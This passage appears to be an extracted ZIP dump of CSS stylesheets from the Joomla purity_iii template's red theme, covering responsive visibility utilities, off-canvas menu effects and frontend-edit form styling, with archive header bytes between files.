  .carousel-control .icon-prev,
  .carousel-control .icon-next {
    width: 30px;
    height: 30px;
    margin-top: -10px;
    font-size: 30px;
  }
  .carousel-control .glyphicon-chevron-left,
  .carousel-control .icon-prev {
    margin-left: -10px;
  }
  .carousel-control .glyphicon-chevron-right,
  .carousel-control .icon-next {
    margin-right: -10px;
  }
  .carousel-caption {
    right: 20%;
    left: 20%;
    padding-bottom: 30px;
  }
  .carousel-indicators {
    bottom: 20px;
  }
}

.clearfix:before,
.clearfix:after,
.container:before,
.container:after,
.container-fluid:before,
.container-fluid:after,
.row:before,
.row:after,
.form-horizontal .form-group:before,
.form-horizontal .form-group:after,
.btn-toolbar:before,
.btn-toolbar:after,
.btn-group-vertical > .btn-group:before,
.btn-group-vertical > .btn-group:after,
.nav:before,
.nav:after,
.navbar:before,
.navbar:after,
.navbar-header:before,
.navbar-header:after,
.navbar-collapse:before,
.navbar-collapse:after,
.pager:before,
.pager:after,
.panel-body:before,
.panel-body:after,
.modal-header:before,
.modal-header:after,
.modal-footer:before,
.modal-footer:after {
  display: table;
  content: " ";
}
.clearfix:after,
.container:after,
.container-fluid:after,
.row:after,
.form-horizontal .form-group:after,
.btn-toolbar:after,
.btn-group-vertical > .btn-group:after,
.nav:after,
.navbar:after,
.navbar-header:after,
.navbar-collapse:after,
.pager:after,
.panel-body:after,
.modal-header:after,
.modal-footer:after {
  clear: both;
}
.center-block {
  display: block;
  margin-right: auto;
  margin-left: auto;
}
.pull-right {
  float: right !important;
}
.pull-left {
  float: left !important;
}
.hide {
  display: none !important;
}
.show {
  display: block !important;
}
.invisible {
  visibility: hidden;
}
.text-hide {
  font: 0/0 a;
  color: transparent;
  text-shadow: none;
  background-color: transparent;
  border: 0;
}
.hidden {
  display: none !important;
}
.affix {
  position: fixed;
}
@-ms-viewport {
  width: device-width;
}
.visible-xs,
.visible-sm,
.visible-md,
.visible-lg {
  display: none !important;
}
.visible-xs-block,
.visible-xs-inline,
.visible-xs-inline-block,
.visible-sm-block,
.visible-sm-inline,
.visible-sm-inline-block,
.visible-md-block,
.visible-md-inline,
.visible-md-inline-block,
.visible-lg-block,
.visible-lg-inline,
.visible-lg-inline-block {
  display: none !important;
}
@media (max-width: 767px) {
  .visible-xs {
    display: block !important;
  }
  table.visible-xs {
    display: table !important;
  }
  tr.visible-xs {
    display: table-row !important;
  }
  th.visible-xs,
  td.visible-xs {
    display: table-cell !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-block {
    display: block !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-inline {
    display: inline !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm {
    display: block !important;
  }
  table.visible-sm {
    display: table !important;
  }
  tr.visible-sm {
    display: table-row !important;
  }
  th.visible-sm,
  td.visible-sm {
    display: table-cell !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-block {
    display: block !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-inline {
    display: inline !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md {
    display: block !important;
  }
  table.visible-md {
    display: table !important;
  }
  tr.visible-md {
    display: table-row !important;
  }
  th.visible-md,
  td.visible-md {
    display: table-cell !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-block {
    display: block !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-inline {
    display: inline !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg {
    display: block !important;
  }
  table.visible-lg {
    display: table !important;
  }
  tr.visible-lg {
    display: table-row !important;
  }
  th.visible-lg,
  td.visible-lg {
    display: table-cell !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-block {
    display: block !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-inline {
    display: inline !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-inline-block {
    display: inline-block !important;
  }
}
@media (max-width: 767px) {
  .hidden-xs {
    display: none !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .hidden-sm {
    display: none !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .hidden-md {
    display: none !important;
  }
}
@media (min-width: 1200px) {
  .hidden-lg {
    display: none !important;
  }
}
.visible-print {
  display: none !important;
}
@media print {
  .visible-print {
    display: block !important;
  }
  table.visible-print {
    display: table !important;
  }
  tr.visible-print {
    display: table-row !important;
  }
  th.visible-print,
  td.visible-print {
    display: table-cell !important;
  }
}
.visible-print-block {
  display: none !important;
}
@media print {
  .visible-print-block {
    display: block !important;
  }
}
.visible-print-inline {
  display: none !important;
}
@media print {
  .visible-print-inline {
    display: inline !important;
  }
}
.visible-print-inline-block {
  display: none !important;
}
@media print {
  .visible-print-inline-block {
    display: inline-block !important;
  }
}
@media print {
  .hidden-print {
    display: none !important;
  }
}PKӜ�\���g3O3O(purity_iii/css/themes/red/off-canvas.cssnu&1i�.off-canvas-toggle {
  z-index: 100;
}
html,
body {
  height: 100%;
}
.noscroll {
  position: fixed;
  overflow-y: scroll;
  width: 100%;
}
.t3-wrapper {
  background: #ffffff;
  position: relative;
  left: 0;
  z-index: 99;
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  overflow: visible;
}
.t3-wrapper::after {
  position: absolute;
  top: 0;
  right: 0;
  width: 0;
  height: 0;
  background: rgba(0, 0, 0, 0.2);
  content: '';
  opacity: 0;
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  z-index: 100;
}
.t3-mainnav-android {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.t3-mainnav-android::after {
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
}
.off-canvas-open .t3-wrapper::after {
  width: 100%;
  height: 10000px;
  opacity: 1;
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.off-canvas-open .t3-mainnav-android::after {
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.t3-off-canvas {
  position: absolute;
  top: 0;
  left: 0;
  z-index: 100;
  visibility: hidden;
  width: 250px;
  height: 100%;
  overflow: hidden;
  -webkit-transition: all 0.5s;
  transition: all 0.5s;
}
.t3-off-canvas::after {
  position: absolute;
  top: 0;
  right: 0;
  width: 100%;
  height: 100%;
  background: rgba(0, 0, 0, 0.2);
  content: '';
  opacity: 1;
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.off-canvas-right.t3-off-canvas {
  display: none;
}
.off-canvas-right .off-canvas-right.t3-off-canvas {
  display: block;
}
html[dir="ltr"] .off-canvas-right.t3-off-canvas {
  left: auto;
  right: 0;
}
.off-canvas-open .t3-off-canvas::after {
  width: 0;
  height: 0;
  opacity: 0;
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
}
.off-canvas-open .off-canvas-current {
  visibility: visible;
}
.off-canvas-open .t3-off-canvas {
  overflow-y: auto;
}
.t3-off-canvas {
  background: #ffffff;
  color: #444444;
}
.t3-off-canvas .t3-off-canvas-header {
  background: #eeeeee;
  color: #444444;
  padding: 6px 12px;
}
.t3-off-canvas .t3-off-canvas-header h2 {
  margin: 0;
}
.t3-off-canvas .t3-off-canvas-body {
  padding: 6px 12px;
}
.t3-off-canvas .t3-off-canvas-body a {
  color: #cc0000;
}
.t3-off-canvas .t3-off-canvas-body a:hover,
.t3-off-canvas .t3-off-canvas-body a:focus {
  color: #800000;
}
.t3-off-canvas .t3-off-canvas-body a:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.t3-off-canvas .t3-off-canvas-body .dropdown-menu {
  position: static;
  float: none;
  display: block;
  width: 100%;
  padding: 0;
  border: 0;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-1.off-canvas-open .off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-1.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
.off-canvas-effect-2.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-2.t3-off-canvas {
  z-index: 1;
}
.off-canvas-effect-2.off-canvas-open .off-canvas-effect-2.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.off-canvas-effect-2.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-2.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-effect-3.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-3.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-3.off-canvas-open .off-canvas-effect-3.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.off-canvas-effect-3.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-3.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-3.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
.off-canvas-effect-4.off-canvas-open .t3-wrapper,
.off-canvas-effect-4.off-canvas-open .t3-mainnav-android {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-4.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(-50%, 0, 0);
  transform: translate3d(-50%, 0, 0);
}
.off-canvas-effect-4.off-canvas-open .off-canvas-effect-4.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-4.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-4.off-canvas-open .t3-wrapper,
.off-canvas-right.off-canvas-effect-4.off-canvas-open .t3-mainnav-android {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-4.t3-off-canvas {
  -webkit-transform: translate3d(50%, 0, 0);
  transform: translate3d(50%, 0, 0);
}
.off-canvas-effect-5.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-5.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(50%, 0, 0);
  transform: translate3d(50%, 0, 0);
}
.off-canvas-effect-5.off-canvas-open .off-canvas-effect-5.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-right.off-canvas-effect-5.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-5.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(-50%, 0, 0);
  transform: translate3d(-50%, 0, 0);
}
body.off-canvas-effect-6 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-6 .t3-wrapper {
  -webkit-transform-origin: 0% 50%;
  transform-origin: 0% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
  height: auto;
  overflow: hidden;
}
.off-canvas-effect-6.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0) rotateY(-15deg);
  transform: translate3d(250px, 0, 0) rotateY(-15deg);
}
.off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-6.off-canvas-open .off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-6.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-6 .t3-wrapper {
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-6.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0) rotateY(15deg);
  transform: translate3d(-250px, 0, 0) rotateY(15deg);
}
.off-canvas-right.off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-7 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-7 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-7.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(-90deg);
  transform: translate3d(-100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-7.off-canvas-open .off-canvas-effect-7.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-7.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-7.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(90deg);
  transform: translate3d(100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-7.off-canvas-open .off-canvas-right.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-8 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-8 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-8.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(90deg);
  transform: translate3d(-100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-8.off-canvas-open .off-canvas-effect-8.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
.off-canvas-effect-8.t3-off-canvas::after {
  display: none;
}
body.off-canvas-effect-8.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-8.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(-90deg);
  transform: translate3d(100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-8.off-canvas-open .off-canvas-right.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-9 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-9 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-9.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(0, 0, -250px);
  transform: translate3d(0, 0, -250px);
}
.off-canvas-effect-9.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-9.off-canvas-open .off-canvas-effect-9.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-9.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-9.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-10 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-10.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-10.t3-off-canvas {
  z-index: 1;
  opacity: 1;
  -webkit-transform: translate3d(0, 0, -250px);
  transform: translate3d(0, 0, -250px);
}
.off-canvas-effect-10.off-canvas-open .off-canvas-effect-10.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
body.off-canvas-effect-10.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-10.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
body.off-canvas-effect-11 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-11 .t3-wrapper {
  height: auto;
  overflow: hidden;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-11.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(100px, 0, -600px) rotateY(-20deg);
  transform: translate3d(100px, 0, -600px) rotateY(-20deg);
}
.off-canvas-effect-11.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-11.off-canvas-open .off-canvas-effect-11.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-11.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-11.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-100px, 0, -600px) rotateY(20deg);
  transform: translate3d(-100px, 0, -600px) rotateY(20deg);
}
.off-canvas-right.off-canvas-effect-11.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-12 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-12 .t3-wrapper {
  height: auto;
  overflow: hidden;
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-12.off-canvas-open .t3-wrapper {
  -webkit-transform: rotateY(-10deg);
  transform: rotateY(-10deg);
}
.off-canvas-effect-12.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-12.off-canvas-open .off-canvas-effect-12.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-12.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-12 .t3-wrapper {
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-12.off-canvas-open .t3-wrapper {
  -webkit-transform: rotateY(10deg);
  transform: rotateY(10deg);
}
.off-canvas-right.off-canvas-effect-12.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-13 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-13.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-13.t3-off-canvas {
  z-index: 1;
  opacity: 1;
  -webkit-transform: translate3d(0, -100%, 0);
  transform: translate3d(0, -100%, 0);
}
.off-canvas-effect-13.off-canvas-open .off-canvas-effect-13.t3-off-canvas {
  -webkit-transition-timing-function: ease-in-out;
  transition-timing-function: ease-in-out;
  -webkit-transition-property: -webkit-transform;
  transition-property: transform;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
  -webkit-transition-speed: 0.2s;
  transition-speed: 0.2s;
}
body.off-canvas-effect-13.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-13.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
body.off-canvas-effect-14 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-14 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-14.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(90deg);
  transform: translate3d(-100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 0% 50%;
  transform-origin: 0% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-14.off-canvas-open .off-canvas-effect-14.t3-off-canvas {
  -webkit-transition-delay: 0.1s;
  transition-delay: 0.1s;
  -webkit-transition-timing-function: ease-in-out;
  transition-timing-function: ease-in-out;
  -webkit-transition-property: -webkit-transform;
  transition-property: transform;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-14.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-14.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(-90deg);
  transform: translate3d(100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-14.off-canvas-open .off-canvas-right.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
.old-ie .t3-off-canvas {
  z-index: 100 !important;
  left: -250px;
}
html[dir="ltr"] .off-canvas-right.old-ie .t3-off-canvas {
  right: -250px;
  left: auto;
}
.modal-open .t3-wrapper {
  position: static;
}
.off-canvas-toggle {
  border-radius: 0;
  border: 0;
  background: transparent;
  color: #ffcccc;
  padding: 0;
  width: 55px;
  height: 55px;
  line-height: 55px;
  position: absolute;
  top: 0;
  left: 0;
}
.off-canvas-toggle:hover,
.off-canvas-toggle:active,
.off-canvas-toggle:focus {
  outline: none;
  -webkit-box-shadow: none;
  box-shadow: none;
  background: #b30000;
  color: #ffffff;
}
@media screen and (max-width: 1024px) {
  .no-responsive #t3-mainnav .container {
    padding-left: 53px;
  }
}
.t3-off-canvas {
  background: #ffffff;
  color: #444444;
}
.t3-off-canvas .t3-off-canvas-header {
  background: #eeeeee;
  color: #444444;
  padding: 0 0 0 12px;
  height: 55px;
}
.t3-off-canvas .t3-off-canvas-header h2 {
  margin: 0;
  line-height: 55px;
  font-size: 14px;
  font-weight: bold;
  text-transform: uppercase;
}
.t3-off-canvas .close {
  margin: 0;
  height: 55px;
  line-height: 55px;
  width: 55px;
  background: transparent;
  position: absolute;
  top: 0;
  right: 0;
}
.t3-off-canvas .t3-off-canvas-body {
  padding: 24px 12px;
}
.t3-off-canvas .t3-off-canvas-body a {
  color: #cc0000;
  text-decoration: none;
}
.t3-off-canvas .t3-off-canvas-body a:hover,
.t3-off-canvas .t3-off-canvas-body a:focus {
  color: #800000;
  text-decoration: none;
}
.t3-off-canvas .t3-off-canvas-body a:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.t3-off-canvas .t3-off-canvas-body .t3-module {
  margin-bottom: 20px;
}
.t3-off-canvas .t3-off-canvas-body .module-title {
  margin-bottom: 10px;
}PKӜ�\�Xl�}H}H+purity_iii/css/themes/red/frontend-edit.cssnu&1i�.com_config .btn,
.com_content.layout-edit .edit.item-page .btn,
.layout-modal .contentpane .btn {
  border-radius: 5px;
  padding: 8px 16px;
}
.com_config input[type="text"],
.com_content.layout-edit .edit.item-page input[type="text"],
.layout-modal .contentpane input[type="text"],
.com_config input[type="email"],
.com_content.layout-edit .edit.item-page input[type="email"],
.layout-modal .contentpane input[type="email"],
.com_config input[type="number"],
.com_content.layout-edit .edit.item-page input[type="number"],
.layout-modal .contentpane input[type="number"],
.com_config input[type="password"],
.com_content.layout-edit .edit.item-page input[type="password"],
.layout-modal .contentpane input[type="password"] {
  box-shadow: none;
  border-radius: 5px;
  padding: 0 12px;
  height: 40px;
  line-height: 40px;
}
.com_config input[type="text"]:focus,
.com_content.layout-edit .edit.item-page input[type="text"]:focus,
.layout-modal .contentpane input[type="text"]:focus,
.com_config input[type="email"]:focus,
.com_content.layout-edit .edit.item-page input[type="email"]:focus,
.layout-modal .contentpane input[type="email"]:focus,
.com_config input[type="number"]:focus,
.com_content.layout-edit .edit.item-page input[type="number"]:focus,
.layout-modal .contentpane input[type="number"]:focus,
.com_config input[type="password"]:focus,
.com_content.layout-edit .edit.item-page input[type="password"]:focus,
.layout-modal .contentpane input[type="password"]:focus {
  border-color: #ccc;
}
.com_config textarea,
.com_content.layout-edit .edit.item-page textarea,
.layout-modal .contentpane textarea {
  border: 1px solid #ddd;
  border-radius: 5px;
  box-shadow: none;
}
.com_config textarea:focus,
.com_content.layout-edit .edit.item-page textarea:focus,
.layout-modal .contentpane textarea:focus {
  box-shadow: none;
  border: 1px solid #ccc;
}
.com_config select,
.com_content.layout-edit .edit.item-page select,
.layout-modal .contentpane select {
  border-radius: 5px;
  height: auto;
  padding: 8px;
}
.com_config .input-group .btn,
.com_content.layout-edit .edit.item-page .input-group .btn,
.layout-modal .contentpane .input-group .btn {
  padding-top: 0;
  padding-bottom: 0;
}
.com_config #templates-form .tip {
  background: #f5f5f5;
  padding: 12px 12px;
}
.com_config #templates-form textarea {
  height: auto;
  width: auto;
  min-height: 100px;
  min-width: 50%;
}
.com_config #templates-form .input-append .add-on,
.com_config #templates-form .input-prepend .add-on {
  width: 35px;
}
.com_config #templates-form .input-append input,
.com_config #templates-form .input-prepend input {
  display: inline-block;
}
.com_config #templates-form .input-append .btn,
.com_config #templates-form .input-prepend .btn {
  border: 1px solid #cccccc;
}
.com_config #templates-form .t3-admin-form-legend {
  display: none;
}
.com_config #templates-form .row-fluid .span6 {
  width: 100%;
}
@media (min-width: 768px) {
  .com_config #templates-form .control-group .control-label {
    width: 250px;
  }
  .com_config #templates-form .control-group .controls {
    margin-left: 280px;
  }
}
.com_config.view-modules #options .accordion-item {
  background-color: #ffffff;
  border: 1px solid #ddd;
  border-radius: 5px;
  margin-bottom: 8px;
}
.com_config.view-modules #options .accordion-header {
  font-size: 18px;
  margin: 0;
  padding: 16px;
  line-height: 1;
}
.com_config.view-modules #options .accordion-header .accordion-button {
  background: transparent;
  border: 0;
  padding: 0;
  text-align: left;
  width: 100%;
}
.com_config.view-modules #options .accordion-body {
  border-top: 1px solid #ddd;
  padding: 24px;
